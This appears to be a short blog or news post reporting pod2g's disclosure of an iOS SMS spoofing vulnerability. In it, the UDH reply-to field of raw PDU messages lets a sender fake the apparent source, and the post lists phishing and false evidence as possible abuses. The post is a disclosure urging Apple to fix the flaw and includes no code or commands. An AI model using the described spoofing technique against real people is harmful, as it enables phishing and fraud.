pod2g has just published a blog regarding an SMS vulnerability he's found in iOS that could allow someone to abuse the protocol for SMS in order to spoof or send fake text messages. The exploit has been an issue since the incarnation of iOS and is still present in iOS 6 beta 4.
He's now urging Apple to fix it.
He goes on to explain a bit about the protocol that is used to send SMS messages, PDU (Protocol Description Unit), and how it works.
PDU is a protocol that is pretty dense, allowing different types of messages to be emitted. Some examples : SMS, Flash SMS, Voice mail alerts, EMS, ... The specification is large and pretty complex. As an example, just to code the data, there are multiple possible choices : 7bit, 8bit, UCS2 (16bit), compressed or not, ...
The problem is that if you own a smartphone or a modem you have the ability to send messages in this raw type of format. There's also an optional section, UDH (User Data Header), that not all smartphones are compatible with but that allows more advanced features to be sent in a message. Some of these "more advanced features" include changing the reply-to address or sending the message from a different number altogether. The iPhone does support these features and contains a vulnerability that makes it susceptible to attacks by hackers that may choose to abuse this system.
pod2g lays out a few ways in which hackers could take advantage of this exploit:
- pirates could send a message that seems to come from the bank of the receiver asking for some private information, or inviting them to go to a dedicated website. [Phishing]
- one could send a spoofed message to your device and use it as a false evidence.
- anything you can imagine that could be utilized to manipulate people, letting them trust somebody or some organization texted them.
There are tools already available that make it rather simple to manipulate this data on smartphones. He's also created a tool for the iPhone 4 that he also plans on releasing. He is currently urging Apple to fix the issue before the public release of iOS 6 and warns that you should never trust an SMS message containing sensitive data on your iPhone in the time being.
Do you think releasing the tool will get Apple's attention or just cause more issues in the mean time for end users?